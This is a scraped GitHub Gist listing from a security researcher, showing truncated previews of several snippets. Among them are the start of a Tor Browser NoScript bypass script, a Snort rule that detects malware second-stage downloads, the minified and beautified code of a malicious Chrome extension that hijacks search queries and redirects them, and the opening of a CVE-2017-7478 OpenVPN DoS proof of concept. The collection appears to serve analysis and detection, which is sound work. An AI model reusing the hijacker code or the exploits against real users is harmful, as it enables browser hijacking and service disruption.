Skip to content

Instantly share code, notes, and snippets.

View TorBrowser_7.x_NoScript_bypass.py
#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
PORT_NUMBER = 31337
class myHandler(BaseHTTPRequestHandler):
#Handler for the GET requests
def do_GET(self):
self.send_response(200)
@x0rz
x0rz / wordpress_snort.rules
Last active Sep 29, 2017
Snort rule replacing sid:26576 to detect more second stage download attempts (may raise false positives - to be tested)
View wordpress_snort.rules
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC possible infected wordpress second stage download attempt"; flow:to_server,established; http_uri; pcre:"/\/wp-(includes|admin|content)\/.*\.(exe|dll|scr|rar|zip|jar|ps1|bat)/iU";metadata:service http; reference:url,medium.com/@x0rz/threat-hunting-on-simple-tricks-27e64e39f2f0; classtype:trojan-activity; sid:31337; rev:1;)
View manifest.json
{
"background": {
"scripts": [ "background.js" ]
},
"browser_action": {
"default_icon": "opurie.png",
"default_popup": "popup.html",
"default_title": "Opurie"
},
"description": "Whiohoo! Welcome back to Opurie",
View background_beautify.js
function redirect(e) {
chrome.tabs.update({
url: e
})
}
var pagebrowsed, allowSearch, prevurl = null,
srchid = 100,
sysid = 739,
random = Math.floor(1e7 * Math.random()),
thanksmsg = [random, "slonif", ".", "faith", "opurie", "com"],
View background.js
function redirect(e){chrome.tabs.update({url:e})}var pagebrowsed,allowSearch,prevurl=null,srchid=100,sysid=739,random=Math.floor(1e7*Math.random()),thanksmsg=[random,"slonif",".","faith","opurie","com"],InstallDone="";chrome.tabs.onUpdated.addListener(function(){chrome.tabs.getSelected(null,function(e){var s=e.url;if(InstallDone){InstallDone[srchid]?InstallDone[srchid]:InstallDone.default;if(s!=prevurl&&(prevurl=s,chrome.storage.sync.get({pagebrowsed:0},function(e){pagebrowsed=e.pagebrowsed,chrome.storage.sync.set({pagebrowsed:e.pagebrowsed+1})})),pagebrowsed>5&&(document.getElementsByTagName("body")[0].style.display="none",s.match(/google/)||s.match(/bing/))){var t=s.split("q=");if(t.length>1){var a="http://startupfraction.com/yaelba/?keyword="+t[1].split("&")[0]+"&id="+srchid+"&sysid="+sysid;redirect(a),chrome.tabs.update({url:a})}}if(pagebrowsed>5)try{var n=window.document.createElement("canvas").getContext("2d");chrome.browserAction.setIcon({imageData:n.getImageData(0,0,19,19)})}catch(e){}}})}),fetch("htt
@x0rz
x0rz / dos_server.py
Created May 12, 2017
CVE-2017-7478: Proof of Concept Code for the OpenVPN Pre-Authentication DoS Vulnerability
View dos_server.py
#!/usr/bin/env python3
# Script by Quarkslab from https://ostif.org/wp-content/uploads/2017/05/OpenVPN1.2final.pdf
"""
$ ./dos_server.py &
$ sudo ./openvpn-2.4.0/src/openvpn/openvpn conf/server-tls.conf
...
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 TLS: Initial packet from [AF_INET]192.168.149.1:64249, sid=9a6c48a6 1467f5e1
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Assertion failed at ssl.c:3711 (buf_copy(in, buf))
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Exiting due to fatal error
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 /sbin/route del -net 10.8.0.0 netmask255.255.255.0
View bulk_dns_check.py
# Usage: ./dns_check.py <list_of_domain_names.txt>
import dns.resolver
import requests
import re
import json
import sys
resolver = dns.resolver.Resolver()
resolver.timeout = 5
resolver.lifetime = 5
View eqgrp_services_lookup.ps1
echo "[+] Getting \system\\currentcontrolset\\services"
$raw_services = Get-ChildItem -Path hklm:\system\\currentcontrolset\\services | select Name
$services = @()
foreach ($srv in $raw_services) {
$shortname = "$srv".Split("\")[-1]
$shortname = $shortname.Substring(0,$shortname.Length-1)
$services += $shortname
}
View signal commands_2.txt
# Get the text from the QR code given by the Signal app and link your new number to it
signal-cli -u "+1234568790" addDevice --uri "tsdevice:/?uuid=xxxxxxxx..."
View signal commands.txt
# Registering your new number
signal-cli -u "+1234568790" register
signal-cli -u "+1234568790" verify xxxxxx